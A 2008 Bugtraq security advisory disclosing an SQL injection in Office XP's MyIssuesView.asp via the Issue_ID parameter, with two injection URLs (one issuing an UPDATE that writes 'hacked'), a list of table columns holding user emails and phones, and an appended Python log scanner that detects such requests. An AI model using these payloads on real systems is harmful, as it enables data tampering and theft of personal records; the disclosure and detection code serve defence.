
List:       bugtraq
Subject:    Office XP Remote SQL Injection
From:       no-reply () Aria-security ! net
Date:       2008-03-13 17:32:04
Message-ID: 20080313173204.7436.qmail () securityfocus ! com

Aria-Security Team (Persian Security Network)
http://forum.Aria-Security.com (ENGLISH FORUM!)
--------------------------------------------------
Shoutz: Aura, Null, Kinglet
Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Advisory: http://forum.aria-security.com/showthread.php?p=21

PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]

Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--


List of columns

QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,
QIssues.Status,QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,
QIssues.Priority,QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,
QIssues.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,QIssues.StaffEmail,
QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEmail,
QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.BrowserAgent,
QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.CustomFields,
QIssues.CloseBy,QIssues.Age



Aria-Security Team
The-0utl4w
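
Added example (not part of the original advisory and not the vendor's code): a log check that flags requests to MyIssuesView.asp whose Issue_ID is not a plain integer; the same allow-list test is the input check the page should apply before the value reaches SQL. The W3C log layout, the sample log lines and the assumption that valid issue IDs are positive integers are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

TARGET = "/myissuesview.asp"        # vulnerable file named in the advisory
PARAM = "issue_id"                  # injectable parameter named in the advisory
VALID_ID = re.compile(r"\d{1,10}")  # assumption: real issue IDs are positive integers

# Constructed sample log (W3C extended format), not taken from a real server.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-03-14 09:12:01 192.0.2.10 GET /MyIssuesView.asp Issue_ID=42 200
2008-03-14 09:12:07 192.0.2.77 GET /MyIssuesView.asp Issue_ID=-1%20having%201=1-- 500
2008-03-14 09:12:09 192.0.2.77 GET /helpdesk/MyIssuesView.asp Issue_ID=-1+update+QIssues+set+column='hacked';-- 200
2008-03-14 09:13:30 192.0.2.10 GET /Default.asp - 200
"""

def is_valid_issue_id(raw):
    """Allow-list check: the whole value must be digits, nothing else."""
    return VALID_ID.fullmatch(raw) is not None

def query_params(query):
    """Yield decoded (name, value) pairs from a cs-uri-query field."""
    if query == "-":                # the log writes '-' for an empty query string
        return
    for pair in query.split("&"):
        name, _, value = pair.partition("=")   # split on the first '=' only
        yield unquote_plus(name).lower(), unquote_plus(value)

def suspicious_requests(log_text):
    """Return (date, time, client_ip, decoded_value) for each bad Issue_ID."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows below
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if not rec.get("cs-uri-stem", "").lower().endswith(TARGET):
            continue
        for name, value in query_params(rec.get("cs-uri-query", "-")):
            if name == PARAM and not is_valid_issue_id(value):
                hits.append((rec["date"], rec["time"], rec["c-ip"], value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit, sep="  ")
```

The allow-list only narrows what reaches the query; the durable fix on the server side is to bind Issue_ID as a typed parameter instead of concatenating it into the SQL string.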

